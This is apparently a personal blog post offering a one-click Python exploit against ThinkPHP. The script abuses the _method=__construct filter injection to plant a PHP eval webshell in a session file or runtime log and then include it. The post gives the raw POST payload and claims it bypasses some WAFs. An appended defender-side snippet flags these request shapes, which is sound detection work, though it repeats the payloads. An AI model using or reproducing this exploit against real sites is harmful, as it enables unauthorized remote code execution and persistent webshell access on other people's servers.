thinkphp-getshell Bypass

I wrote this years ago for testing. It mainly relies on session getshell, or on the thinkphp log. // do not use for attacks, testing only
```python
# Python 2 script (print statements); left as the author wrote it
import requests
import time
import sys
def session_write(url):
    fuck = {'_method': '__construct', 'filter[]': 'think\Session::set', 'method': 'get',
            'get[]': "<?php @eval($_POST['x'])?>",'server[]':'1'}
    res = requests.post(url,cookies={'PHPSESSID':'9enl96jhqjhvuj37t0m6aluule'},data=fuck,headers={'User-Agent':'Mozilla/5.0 (Macintosh; BaiduSpider)'})
    fuckshell = {'_method': '__construct', 'filter[]': 'think\__include_file', 'method': 'get',
            'server[REQUEST_METHOD]': '/tmp/sess_9enl96jhqjhvuj37t0m6aluule','x':'print(2020202020);'}
    res = requests.post(url, cookies={'PHPSESSID': '9enl96jhqjhvuj37t0m6aluule'}, data=fuckshell,
                        headers={'User-Agent': 'Mozilla/5.0 (Macintosh; BaiduSpider)'})
    return res.text

def log_shell(url):
    day = '../data/runtime/log/'+time.strftime("%Y%m/%d.log", time.localtime())
    print day
    fuck = {'_method': '__construct', 'filter[]': 'call_user_func','method':'get','get[]': "<?php @eval($_POST['x'])?>",'server[]':'1'}
    res = requests.post(url,cookies={'PHPSESSID':'9enl96jhqjhvuj37t0m6aluule'},data=fuck,headers={'User-Agent':'Mozilla/5.0 (Macintosh; BaiduSpider)'})
    fuckshell = {'_method': '__construct', 'filter[]': 'think\__include_file', 'method': 'get',
            'server[REQUEST_METHOD]':day,'x':'print(2020202020);'}
    res = requests.post(url, cookies={'PHPSESSID': '9enl96jhqjhvuj37t0m6aluule'}, data=fuckshell,
                        headers={'User-Agent': 'Mozilla/5.0 (Macintosh; BaiduSpider)'})
    return res.text
# guard on argument count, otherwise a missing argument raises IndexError instead of printing usage
if len(sys.argv) > 1:
    url=sys.argv[1]+'index.php?s=captcha'
else:
    exit("exp.py http://xxxx")
if '20202020' in session_write(url):
    print "shell ok    session shell"
elif '20202020' in log_shell(url):
    print "shell ok    log shell"
else:
    print "bad"
```

use:

Just pass in the address; one click and it is done.....

Most of my blog posts are just to record personal notes.

Connection method:

POST DATA

_method=__construct&filter[]=think\__include_file&method=get&server[REQUEST_METHOD]=/tmp/sess_9enl96jhqjhvuj37t0m6aluule

Benefits: bypasses some WAFs, and the one-liner payload can be swapped out.

When the web root is not writable, doing an include is more convenient.

If the session getshell fails, the script tries the thinkphp log method. The result is echoed back; test and modify it yourself.
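As an added defender-side example (not part of the original post), the following Python 3 snippet triages URL-encoded POST bodies for the request shape this bypass relies on: `_method=__construct`, a `filter[]` naming `think\__include_file` or `think\Session::set`, `server[...]` overrides, and PHP open tags in parameter values. The sample bodies are constructed for the example, not captured traffic.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies, not captured traffic. The first three mirror
# the payload shapes this page shows; the last two are benign look-alikes.
SAMPLE_BODIES = [
    "_method=__construct&filter[]=think\\__include_file&method=get"
    "&server[REQUEST_METHOD]=/tmp/sess_9enl96jhqjhvuj37t0m6aluule",
    "_method=__construct&filter[]=think\\Session::set&method=get"
    "&get[]=%3C%3Fphp+%40eval%28%24_POST%5B%27x%27%5D%29%3F%3E&server[]=1",
    "_method=__construct&filter[]=call_user_func&method=get&get[]=x&server[]=1",
    "_method=PUT&name=alice",
    "filter[]=trim&q=hello",
]

# Callables the page's bypass hands to filter[], plus a few generic dangerous ones.
RISKY_FILTERS = {
    "think\\__include_file", "think\\session::set",
    "call_user_func", "system", "assert", "eval",
}

def analyse_body(body):
    """Return indicator strings for one URL-encoded POST body (empty = clean)."""
    params = parse_qs(body, keep_blank_values=True)
    hits = []
    if params.get("_method", [""])[0] == "__construct":
        hits.append("_method=__construct reaches Request::__construct")
    for f in params.get("filter[]", []):
        if f.lower() in RISKY_FILTERS:
            hits.append("filter[] names risky callable: %s" % f)
    if any(k.startswith("server[") for k in params):
        hits.append("server[...] overrides the request environment")
    if any(re.search(r"<\?php|<\?=", v) for vals in params.values() for v in vals):
        hits.append("PHP open tag in a parameter value")
    return hits

def scan(bodies):
    """Map index -> indicators for every body that raised at least one."""
    flagged = {}
    for i, body in enumerate(bodies):
        hits = analyse_body(body)
        if hits:
            flagged[i] = hits
    return flagged

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_BODIES).items():
        print("body %d:" % i, "; ".join(hits))
```

The same checks can be run over a WAF's decoded request-body log or a reverse proxy's access log to find attempts after the fact.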

